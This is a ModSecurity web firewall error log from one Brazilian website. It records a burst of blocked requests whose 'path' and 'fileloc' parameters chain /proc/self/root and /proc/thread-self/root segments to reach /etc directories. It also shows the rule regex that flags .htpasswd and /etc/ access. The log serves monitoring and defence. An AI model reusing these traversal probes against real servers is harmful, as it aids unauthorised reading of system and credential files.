[Tue Mar 17 09:04:50.384228 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.241.46:39478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDYpDEJR9VXonE_-1KYQAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:04:50.793803 2026] [:error] [pid 1961:tid 140411590858496] [client 74.7.243.203:41372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDYnRXaaWotPICgYsiDAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:54.535730 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:41374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDZpqmL8PQht4WJFlDsQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:55.813717 2026] [:error] [pid 1210:tid 140411658000128] [client 74.7.243.203:41376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDZ1KJy4A1bGlmj9BSLAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:57.174598 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.203:41390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDaaBJNF7axNlVR0X5cgAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:58.472700 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.243.203:41398] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDau82sZHvlq4xgHq_lgAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:05:00.794619 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:41410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDbKBJNF7axNlVR0X5dQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:05:09.288568 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.243.203:53296] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDdQeiSKl8TjouI-b-7gAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:05:10.749887 2026] [:error] [pid 1961:tid 140411590858496] [client 74.7.241.46:33376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDdnRXaaWotPICgYsiJAAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:12.062678 2026] [:error] [pid 7000:tid 140411599251200] [client 74.7.241.46:36318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDeBePVOt35XCGZP8sKgAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:13.284347 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:36326] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDeQQohV2v-7oj5HH3cAAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:14.231035 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.243.203:43864] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDehePVOt35XCGZP8sLAAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:14.544831 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.241.46:36332] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDegQohV2v-7oj5HH3cgAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:15.741284 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.46:36336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDeweiSKl8TjouI-b-8AAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:17.053039 2026] [:error] [pid 1210:tid 140411599251200] [client 74.7.241.46:36346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDfVKJy4A1bGlmj9BSLgAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:18.205428 2026] [:error] [pid 7000:tid 140411590858496] [client 74.7.241.46:43850] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDfhePVOt35XCGZP8sLQAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:19.517289 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.241.46:43854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDf-82sZHvlq4xgHq_nAAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:20.671355 2026] [:error] [pid 1016:tid 140411716749056] [client 74.7.241.46:43868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDgJqmL8PQht4WJFlDtQAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:24.601279 2026] [:error] [pid 1210:tid 140411641214720] [client 74.7.241.46:43876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDglKJy4A1bGlmj9BSLwAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:26.017504 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.241.46:43884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDhgQohV2v-7oj5HH3dAAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:27.179858 2026] [:error] [pid 2305:tid 140411590858496] [client 74.7.241.46:43886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDhwQohV2v-7oj5HH3dgAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
